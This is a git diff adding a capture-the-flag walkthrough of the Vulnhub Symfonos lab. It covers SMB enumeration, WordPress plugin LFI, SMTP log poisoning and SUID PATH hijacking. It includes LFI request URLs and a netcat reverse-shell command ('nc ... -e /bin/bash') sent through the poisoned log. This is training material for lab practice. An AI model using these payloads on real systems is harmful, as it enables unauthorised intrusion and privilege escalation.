diff --git a/HackTheBox/Symfonos.md b/HackTheBox/Symfonos.md
new file mode 100644
index 0000000..4532155
--- /dev/null
+++ b/HackTheBox/Symfonos.md
@@ -0,0 +1,219 @@
+# Vulnhub-Symfonos
+
+## Rustscan
+
+```bash
+
+22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
+| ssh-hostkey:
+| 2048 ab:5b:45:a7:05:47:a5:04:45:ca:6f:18:bd:18:03:c2 (RSA)
+| 256 a0:5f:40:0a:0a:1f:68:35:3e:f4:54:07:61:9f:c6:4a (ECDSA)
+|_ 256 bc:31:f5:40:bc:08:58:4b:fb:66:17:ff:84:12:ac:1d (ED25519)
+25/tcp open smtp Postfix smtpd
+|_smtp-commands: symfonos.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8,
+| ssl-cert: Subject: commonName=symfonos
+| Subject Alternative Name: DNS:symfonos
+| Not valid before: 2019-06-29T00:29:42
+|_Not valid after: 2029-06-26T00:29:42
+|_ssl-date: TLS randomness does not represent time
+80/tcp open http Apache httpd 2.4.25 ((Debian))
+|_http-server-header: Apache/2.4.25 (Debian)
+|_http-title: Site doesn't have a title (text/html).
+139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
+445/tcp open netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
+MAC Address: 08:00:27:41:21:96 (Oracle VirtualBox virtual NIC)
+Service Info: Hosts: symfonos.localdomain, SYMFONOS; OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+```
+
+## PROT 139/445 (SMB)
+
+I ran `smbmap` to see on which shares I have read access as anonmyous user
+
+
+
+So we only have read access to `anomyous`share
+
+
+
+We can see there a text so let's download it using `GET`
+
+
+
+
+
+This looks like some potential passwords we can use when brute forcing we also have a username `zeus`
+
+Let's run `enum4linux-ng` to enumerate for users
+
+
+
+
+
+We only get one user `helios`
+
+
+## PORT 80 (HTTP)
+
+
+
+On the web server we see this weird image
+
+
+
+There's nothing in the source either , so I started to fuzz for files and directories using `dirsearch`
+
+
+
+But found nothing , so brute forcing is the last resort this is what I'll be doing , we have a username so we could try to brute force against those 3 passwords , if that fails I'll move to rockyou.txt
+
+
+
+It failed so let's try these 3 passwords on smb as `helios`
+
+
+
+The first password failed but the second worked and we can access his share now
+
+
+
+After reading `todo.txt` we get a hidden directory
+
+
+
+
+
+So this is a wordpress site but the css isn't loaded , we can fix it by seeing where it's grabbing the css file from
+
+
+
+We need to add a domain `symfonos.local` in `/etc/hosts` file
+
+
+
+
+
+Now it looks better so let's enumerate the wordpress site for that I am going to use `wpscan`
+
+
+
+
+
+We have a user `admin` so we could do brute forcing for his password
+
+Also I'll run a scan for enumerating plugins being used on the wordpress site
+
+
+
+
+
+We can see two plugins , `mail-masta` and `site-editor`, first I am going to search on mail-masta for any exploits
+
+
+
+And it seems we found a LFI vulnerability exploit in mail-masta
+
+
+
+Let's give it a try in reading `/etc/passwd` file through LFI
+
+
+
+And boom we got LFI vulnerability here
+
+The other plugin is also vulnerable to LFI
+
+
+
+
+
+
+
+Now we know there that port 25 which is smtp is open so we could see if we could poision it's log files ,so visiting hacktricks I found that it's possible
+
+
+
+
+```
+http://symfonos.local/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/mail/helios
+```
+
+
+
+We can read the logs so it's possbile, I followed this article in order to do smtp log poisioning
+
+https://liberty-shell.com/sec/2018/05/19/poisoning/
+
+
+
+The sender's mail is just I saw from the logs so I putted there but that important thing to note here is the subject we are putting which is the GET paramtere being executed as shell command. Now if add a paramter along the path of log file
+
+```
+http://symfonos.local/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/mail/helios&pwn=id
+```
+
+
+
+So let's just get a shell with `netcat`
+
+```
+http://symfonos.local/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/mail/helios&hello=nc 192.168.1.2 2222 -e /bin/bash
+```
+
+
+
+
+
+Now we check if we have permissions to run any command as sudo with `sudo -l`
+
+
+
+No sudo : \
+
+Let's check for any SUID binaries
+
+
+
+We found `/opt/statuscheck`. On running the binary it results to making a request
+
+
+
+Let's further analyze the binary if strings is installed on the machine
+
+
+
+It is available so we can see what the binary is doing
+
+
+
+The binary is using a command `curl http://localhost` so we can exploit PATH variable here by making a fake curl binary include `bash` there and including that binary in the PATH variable
+
+
+
+
+
+
+
+However if we run it , we won't get a root shell
+
+
+
+I then tried to make bash a SUID
+
+
+
+
+
+It gave me an error, so I was not sure why this wasn't working, so I then just removed the shebang line
+
+
+
+Ran it again
+
+
+
+And boom we have made bash a SUID
+
+
+
+